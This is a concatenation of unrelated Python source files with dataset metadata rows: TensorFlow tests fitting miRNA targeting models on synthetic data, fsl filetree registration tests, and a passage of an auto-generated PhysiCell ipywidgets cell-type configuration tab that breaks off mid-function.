true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_decay = -1.5
true_bias1 = -1
true_bias2 = -0.4
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_bias1)
weighted2 = sigmoid(np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3) + true_bias2)
weighted = np.multiply(weighted1, weighted2)
labels = np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.DoubleSigmoidModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('True bias1 diff: {}'.format(np.abs(model.vars_evals['bias1'] - true_bias1)))
print('True bias2 diff: {}'.format(np.abs(model.vars_evals['bias2'] - true_bias2)))
print('Label r2: {}'.format(model.r2))
def test_sigmoidfreeago_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_decay = 1.5
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_freeAgo)
weighted2 = np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3)
weighted = weighted1 + weighted2
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.SigmoidFreeAGOModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print(model.vars_evals['coefs_pre_sigmoid'].flatten())
print(true_weights1.flatten())
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('Label r2: {}'.format(model.r2))
def test_doublesigmoidfreeago_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_decay = 1.5
true_bias = -0.4
weighted1 = true_decay * sigmoid(np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3) + true_freeAgo)
weighted2 = sigmoid(np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3) + true_bias)
weighted = np.multiply(weighted1, weighted2)
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.DoubleSigmoidFreeAGOModel(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('True bias diff: {}'.format(np.abs(model.vars_evals['bias'] - true_bias)))
print('Label r2: {}'.format(model.r2))
def test_doublesigmoidfreeagolet7_model(num_genes, num_mirs, num_max_sites, num_pre_features, num_post_features, maxiter):
# generate random data
np.random.seed(0)
num_features = num_pre_features + num_post_features
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites, num_features])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites,:] = np.random.rand(nsites, num_features)
mask = ((np.abs(np.sum(features, axis=3))) != 0).astype(int)
true_weights1 = (np.arange(num_pre_features) + 1.0).reshape([1, 1, 1, -1])
true_weights1 = (true_weights1 - np.mean(true_weights1)) / np.std(true_weights1)
true_weights2 = (np.arange(num_post_features) + 1.0).reshape([1, 1, 1, -1])
true_weights2 = (true_weights2 - np.mean(true_weights2)) / np.std(true_weights2)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_freeAgolet7 = true_freeAgo[0,-1,0] - 1
true_decay = 1.5
true_bias = -0.4
weighted1 = np.sum(np.multiply(features[:, :, :, :num_pre_features], true_weights1), axis=3)
occ1 = sigmoid(weighted1 + true_freeAgo)
print(np.mean(np.mean(occ1, axis=2), axis=0))
occ1[:, -1, :] -= sigmoid(weighted1[:, -1, :] + true_freeAgolet7)
print(np.mean(np.mean(occ1, axis=2), axis=0))
print(np.min(occ1))
occ1 *= true_decay
weighted2 = sigmoid(np.sum(np.multiply(features[:, :, :, num_pre_features:], true_weights2), axis=3) + true_bias)
weighted = np.multiply(occ1, weighted2)
labels = -1 * np.sum(np.multiply(weighted, mask), axis=2)
print(features.shape)
print(mask.shape)
print(labels.shape)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None, num_features], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='nsites')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'features': features_tensor,
'mask': mask_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
labels_tensor: labels
}
model = models.DoubleSigmoidFreeAGOLet7Model(num_pre_features, num_post_features, num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True weight1 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_pre_sigmoid'] - true_weights1))))
print('True weight2 diff: {}'.format(np.sum(np.abs(model.vars_evals['coefs_post_sigmoid'] - true_weights2))))
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True freeAgo_let7 diff: {}'.format(np.abs(model.vars_evals['let7_freeago_init'] - true_freeAgolet7)))
print('True decay diff: {}'.format(np.abs(model.vars_evals['decay'] - true_decay)))
print('True bias diff: {}'.format(np.abs(model.vars_evals['bias'] - true_bias)))
print('Label r2: {}'.format(model.r2))
def test_original_model(num_genes, num_mirs, num_max_sites, maxiter):
# generate random data
np.random.seed(0)
utr_lengths = (np.random.randint(5000, size=num_genes) / 2000).reshape([-1, 1])
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites] = np.random.rand(nsites)
mask = (features != 0).astype(int)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_decay = 1.5
true_utr_coef = 0.1
occ = sigmoid(features + true_freeAgo)
nbound = true_decay * np.sum(occ * mask, axis=2)
nbound_endog = true_utr_coef * utr_lengths
pred_endog = np.log1p(nbound_endog)
pred_transfect = np.log1p(nbound_endog + nbound)
labels = -1 * (pred_transfect - pred_endog)
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='mask')
utrlen_tensor = tf.placeholder(tf.float32, shape=[None, 1], name='utr_len')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'ka_vals': features_tensor,
'mask': mask_tensor,
'utr_len': utrlen_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
utrlen_tensor: utr_lengths,
labels_tensor: labels
}
model = models.OriginalModel(num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True decay diff: {}'.format(np.abs(np.exp(model.vars_evals['log_decay']) - true_decay)))
print('True utr_coef diff: {}'.format(np.abs(np.exp(model.vars_evals['log_utr_coef']) - true_utr_coef)))
print('Label r2: {}'.format(model.r2))
def test_originallet7_model(num_genes, num_mirs, num_max_sites, maxiter):
# generate random data
np.random.seed(0)
utr_lengths = (np.random.randint(5000, size=num_genes) / 2000).reshape([-1, 1])
# get a random number of sites per mRNA/miRNA interaction
features = np.zeros([num_genes, num_mirs, num_max_sites])
for i in range(num_genes):
for j in range(num_mirs):
nsites = np.random.choice(num_max_sites)
features[i,j,:nsites] = np.random.rand(nsites)
mask = (features != 0).astype(int)
true_freeAgo = np.random.random(num_mirs).reshape([1, -1, 1])
true_freeAgolet7 = true_freeAgo[0,-1,0] - 1
true_decay = 1.5
true_utr_coef = 0.1
occ = sigmoid(features + true_freeAgo)
nbound = true_decay * np.sum(occ * mask, axis=2)
nbound_endog = true_utr_coef * utr_lengths
pred_endog = np.log1p(nbound_endog)
pred_transfect = np.log1p(nbound_endog + nbound)
labels = -1 * (pred_transfect - pred_endog)
occ_let7 = sigmoid(features[:, -1, :] + true_freeAgolet7)
nbound_let7 = true_decay * np.sum(occ_let7 * mask[:, -1, :], axis=1)
labels2 = -1 * (np.log1p(nbound_let7 + nbound_endog[:, -1]) - pred_endog[:, -1])
print(labels[:, -1].shape)
labels[:, -1] -= labels2
tf.reset_default_graph()
features_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='features')
mask_tensor = tf.placeholder(tf.float32, shape=[None, None, None], name='mask')
utrlen_tensor = tf.placeholder(tf.float32, shape=[None, 1], name='utr_len')
labels_tensor = tf.placeholder(tf.float32, shape=[None, None], name='labels')
data = {
'ka_vals': features_tensor,
'mask': mask_tensor,
'utr_len': utrlen_tensor,
'labels': labels_tensor
}
feed_dict = {
features_tensor: features,
mask_tensor: mask,
utrlen_tensor: utr_lengths,
labels_tensor: labels
}
model = models.OriginalModelLet7(num_mirs)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
model.fit(sess, data, feed_dict, maxiter)
print('True freeAgo diff: {}'.format(np.sum(np.abs(model.vars_evals['freeAgo'] - true_freeAgo))))
print('True freeAgo_let7 diff: {}'.format(np.abs(model.vars_evals['freeAgo_init_let7'] - true_freeAgolet7)))
print('True decay diff: {}'.format(np.abs(np.exp(model.vars_evals['log_decay']) - true_decay)))
print('True utr_coef diff: {}'.format(np.abs(np.exp(model.vars_evals['log_utr_coef']) - true_utr_coef)))
print('Label r2: {}'.format(model.r2))
# test_linear_model(5000,17,50,24,200)
# test_linear_model(100,17,10,10,200)
# test_boundedlinear_model(100,17,10,10,200)
# test_sigmoid_model(100, 5, 12, 5, 5, 2000)
# test_sigmoid_model(5000, 5, 50, 5, 5, 2000)
# test_doublesigmoid_model(100, 5, 12, 5, 5, 2000)
# test_doublesigmoid_model(5000, 5, 50, 5, 5, 2000)
# test_sigmoidfreeago_model(100, 5, 12, 5, 5, 2000)
# test_sigmoidfreeago_model(5000, 5, 50, 5, 5, 2000)
# test_doublesigmoidfreeago_model(100, 5, 12, 5, 5, 2000)
# test_doublesigmoidfreeago_model(5000, 5, 50, 5, 5, 2000)
# test_doublesigmoidfreeagolet7_model(100, 5, 12, 5, 5, 2000)
# test_doublesigmoidfreeagolet7_model(5000, 5, 50, 5, 5, 2000)
# test_original_model(100, 5, 12, 2000)
test_originallet7_model(100, 5, 12, 2000)
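# --- editor note (hedged) ---------------------------------------------------
# The tests above assume `np` (NumPy), `tf` (TensorFlow 1.x), the `models`
# module, and a `sigmoid` helper are imported/defined earlier in this file.
# For reference, the elementwise logistic used for site occupancy is simply:
#
#     def sigmoid(x):
#         return 1.0 / (1.0 + np.exp(-x))
#
# It is kept commented out here so it cannot shadow the module's own
# definition.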
| 38.489633 | 133 | 0.664526 | 3,373 | 24,133 | 4.541358 | 0.051586 | 0.006398 | 0.016908 | 0.039757 | 0.923815 | 0.917222 | 0.903251 | 0.896919 | 0.877073 | 0.86715 | 0 | 0.032485 | 0.191273 | 24,133 | 626 | 134 | 38.551118 | 0.75237 | 0.056644 | 0 | 0.814286 | 0 | 0 | 0.066429 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02619 | false | 0 | 0.011905 | 0.004762 | 0.042857 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aa5b13390157d4dd81e54658fbc7f4b8b90d62f8 | 76 | py | Python | streambook/__init__.py | cgarciae/streambook | bced492de248782f6ed8d85ee1ec7ad9e1e37cc2 | [
"MIT"
] | 251 | 2021-02-16T10:11:35.000Z | 2022-03-21T11:25:14.000Z | streambook/__init__.py | cgarciae/streambook | bced492de248782f6ed8d85ee1ec7ad9e1e37cc2 | [
"MIT"
] | 16 | 2021-04-12T15:03:52.000Z | 2022-03-07T20:54:40.000Z | streambook/__init__.py | cgarciae/streambook | bced492de248782f6ed8d85ee1ec7ad9e1e37cc2 | [
"MIT"
] | 13 | 2021-02-17T05:36:38.000Z | 2022-02-02T16:27:35.000Z | from .lib import * # noqa: F401,F403
from .gen import * # noqa: F401,F403
| 25.333333 | 37 | 0.657895 | 12 | 76 | 4.166667 | 0.583333 | 0.4 | 0.56 | 0.72 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 0.210526 | 76 | 2 | 38 | 38 | 0.633333 | 0.407895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
aa7171ee81d30accb2f55068a387a214557a8965 | 2,403 | py | Python | tests/test_filetree/test_registration.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 6 | 2018-04-18T03:42:50.000Z | 2021-11-20T18:46:37.000Z | tests/test_filetree/test_registration.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 13 | 2018-10-01T11:45:05.000Z | 2022-03-16T12:28:36.000Z | tests/test_filetree/test_registration.py | physimals/fslpy | 10dd3f996c79d402c65cf0af724b8b00082d5176 | [
"Apache-2.0"
] | 5 | 2017-12-09T09:02:17.000Z | 2021-11-15T16:55:30.000Z | from fsl.utils.filetree import register_tree, FileTree
import os.path as op
class SubFileTree(FileTree):
pass
def test_register_parent():
    """register_tree should control which FileTree subclass .read returns."""
directory = op.split(__file__)[0]
filename = op.join(directory, 'parent.tree')
# call from sub-type
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
# call from FileTree
tree = FileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
# register + call from FileTree
register_tree('parent', SubFileTree)
tree = FileTree.read(filename)
assert isinstance(tree, FileTree)
assert isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
# register + call from SubFileTree
register_tree('parent', FileTree)
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
def test_children():
    """Registered sub-tree names determine the class of loaded child trees."""
directory = op.split(__file__)[0]
filename = op.join(directory, 'parent.tree')
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
register_tree('eddy', SubFileTree)
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert isinstance(child, SubFileTree)
register_tree('eddy', FileTree)
tree = SubFileTree.read(filename)
assert isinstance(tree, FileTree)
assert not isinstance(tree, SubFileTree)
for child in tree.sub_trees.values():
assert isinstance(child, FileTree)
assert not isinstance(child, SubFileTree)
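# --- editor note (hedged) ---------------------------------------------------
# The assertions above pin down the dispatch behaviour of register_tree:
# after a tree name is registered to a class, reads of trees with that name
# return instances of that class, regardless of which class .read() is
# called on. A minimal sketch using the same names as the tests:
#
#     register_tree('parent', SubFileTree)
#     tree = FileTree.read(filename)     # -> SubFileTree instance
#     register_tree('parent', FileTree)
#     tree = SubFileTree.read(filename)  # -> plain FileTree instance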
| 32.472973 | 54 | 0.706201 | 277 | 2,403 | 6.043321 | 0.133574 | 0.162485 | 0.111708 | 0.177419 | 0.860215 | 0.860215 | 0.830346 | 0.830346 | 0.830346 | 0.807049 | 0 | 0.001046 | 0.204328 | 2,403 | 73 | 55 | 32.917808 | 0.874477 | 0.041615 | 0 | 0.803571 | 0 | 0 | 0.018277 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.035714 | false | 0.017857 | 0.035714 | 0 | 0.089286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
aaadd5b68a6a62e67a7baad86238c9db72ae25a7 | 129,071 | py | Python | data/cell_types.py | sysbio-curie/pb4covid19 | 158f124a79e2395e2d862e0e1318d2fba56ff477 | [
"BSD-3-Clause"
] | null | null | null | data/cell_types.py | sysbio-curie/pb4covid19 | 158f124a79e2395e2d862e0e1318d2fba56ff477 | [
"BSD-3-Clause"
] | null | null | null | data/cell_types.py | sysbio-curie/pb4covid19 | 158f124a79e2395e2d862e0e1318d2fba56ff477 | [
"BSD-3-Clause"
] | null | null | null |
# This file is auto-generated from a Python script that parses a PhysiCell configuration (.xml) file.
#
# Edit at your own risk.
#
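# Editor note (hedged): each labelled widget row below mirrors one element of
# the PhysiCell XML this file was generated from. For example, the first
# cycle row corresponds to a fragment of roughly this shape (illustrative,
# not copied from the actual .xml):
#
#   <phase_transition_rates units="1/min">
#       <rate start_index="0" end_index="1" fixed_duration="false">0</rate>
#   </phase_transition_rates>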
import os
from ipywidgets import Label,Text,Checkbox,Button,HBox,VBox,FloatText,IntText,BoundedIntText,BoundedFloatText,Layout,Box,Dropdown
class CellTypesTab(object):
def __init__(self):
        micron_units = Label('micron')  # use Option-m (macOS) to type the micro symbol
constWidth = '180px'
tab_height = '500px'
stepsize = 10
#style = {'description_width': '250px'}
style = {'description_width': '25%'}
layout = {'width': '400px'}
name_button_layout={'width':'25%'}
widget_layout = {'width': '15%'}
widget_layout_long = {'width': '20%'}
units_button_layout ={'width':'15%'}
desc_button_layout={'width':'45%'}
        divider_button_layout={'width':'60%'}
box_layout = Layout(display='flex', flex_flow='row', align_items='stretch', width='100%')
self.cell_type_dropdown = Dropdown(description='Cell type:',)
self.cell_type_dropdown.style = {'description_width': '%sch' % str(len(self.cell_type_dropdown.description) + 1)}
cell_type_names_layout={'width':'30%'}
cell_type_names_style={'description_width':'initial'}
self.parent_name = Text(value='None',description='inherits properties from parent type:',disabled=True, style=cell_type_names_style, layout=cell_type_names_layout)
explain_inheritance = Label(value=' This cell line inherits its properties from its parent type. Any settings below override those inherited properties.') # , style=cell_type_names_style, layout=cell_type_names_layout)
self.cell_type_parent_row = HBox([self.cell_type_dropdown, self.parent_name])
self.cell_type_parent_dict = {}
self.cell_type_dict = {}
self.cell_type_dict['default'] = 'default'
self.cell_type_dict['lung epithelium'] = 'lung epithelium'
self.cell_type_dict['immune'] = 'immune'
self.cell_type_dict['CD8 Tcell'] = 'CD8 Tcell'
self.cell_type_dict['macrophage'] = 'macrophage'
self.cell_type_dict['neutrophil'] = 'neutrophil'
self.cell_type_dropdown.options = self.cell_type_dict
self.cell_type_dropdown.observe(self.cell_type_cb)
self.cell_type_parent_dict['default'] = 'None'
self.cell_type_parent_dict['lung epithelium'] = 'default'
self.cell_type_parent_dict['immune'] = 'default'
self.cell_type_parent_dict['CD8 Tcell'] = 'immune'
self.cell_type_parent_dict['macrophage'] = 'immune'
self.cell_type_parent_dict['neutrophil'] = 'immune'
self.cell_def_vboxes = []
self.bnd_filenames = [None]*6
self.cfg_filenames = [None]*6
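        # Editor note (hedged): `cell_type_cb` is defined elsewhere in this
        # class; a minimal observer consistent with the dictionaries above
        # would update the parent label on dropdown changes (hypothetical):
        #
        #     def cell_type_cb(self, change):
        #         if change['name'] == 'value':
        #             self.parent_name.value = self.cell_type_parent_dict[change['new']]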
# >>>>>>>>>>>>>>>>> <cell_definition> = default
# -------------------------
div_row1 = Button(description='phenotype:cycle (model: flow_cytometry_separated_cycle_model; code=6)', disabled=True, layout=divider_button_layout)
div_row1.style.button_color = 'orange'
name_btn = Button(description='Phase 0 -> Phase 1 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float0 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float0, units_btn, ]
box0 = Box(children=row, layout=box_layout)
name_btn = Button(description='Phase 1 -> Phase 2 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float1 = FloatText(value='0.00208333', step='0.0001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float1, units_btn, ]
box1 = Box(children=row, layout=box_layout)
name_btn = Button(description='Phase 2 -> Phase 3 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float2 = FloatText(value='0.00416667', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float2, units_btn, ]
box2 = Box(children=row, layout=box_layout)
name_btn = Button(description='Phase 3 -> Phase 0 transition rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float3 = FloatText(value='0.0166667', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float3, units_btn, ]
box3 = Box(children=row, layout=box_layout)
# -------------------------
div_row2 = Button(description='phenotype:death', disabled=True, layout=divider_button_layout)
div_row2.style.button_color = 'orange'
death_model1 = Button(description='model: apoptosis', disabled=True, layout={'width':'30%'})
death_model1.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float4 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float4, units_btn, ]
box4 = Box(children=row, layout=box_layout)
name_btn = Button(description='unlysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float5 = FloatText(value='0.05', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float5, units_btn, ]
box5 = Box(children=row, layout=box_layout)
name_btn = Button(description='lysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float6 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float6, units_btn, ]
box6 = Box(children=row, layout=box_layout)
name_btn = Button(description='cytoplasmic_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float7 = FloatText(value='1.66667e-02', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float7, units_btn, ]
box7 = Box(children=row, layout=box_layout)
name_btn = Button(description='nuclear_biomass_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float8 = FloatText(value='5.83333e-03', step='0.001', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float8, units_btn, ]
box8 = Box(children=row, layout=box_layout)
name_btn = Button(description='calcification_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float9 = FloatText(value='0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float9, units_btn, ]
box9 = Box(children=row, layout=box_layout)
name_btn = Button(description='relative_rupture_volume', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float10 = FloatText(value='2.0', step='0.1', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float10, units_btn, ]
box10 = Box(children=row, layout=box_layout)
death_model2 = Button(description='model: necrosis', disabled=True, layout={'width':'30%'})
death_model2.style.button_color = '#ffde6b'
name_btn = Button(description='death rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'tan'
self.float11 = FloatText(value='0.0', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'tan'
row = [name_btn, self.float11, units_btn, ]
box11 = Box(children=row, layout=box_layout)
name_btn = Button(description='unlysed_fluid_change_rate', disabled=True, layout=name_button_layout)
name_btn.style.button_color = 'lightgreen'
self.float12 = FloatText(value='0.05', step='0.01', style=style, layout=widget_layout)
units_btn = Button(description='1/min', disabled=True, layout=name_button_layout)
units_btn.style.button_color = 'lightgreen'
row = [name_btn, self.float12, units_btn, ]
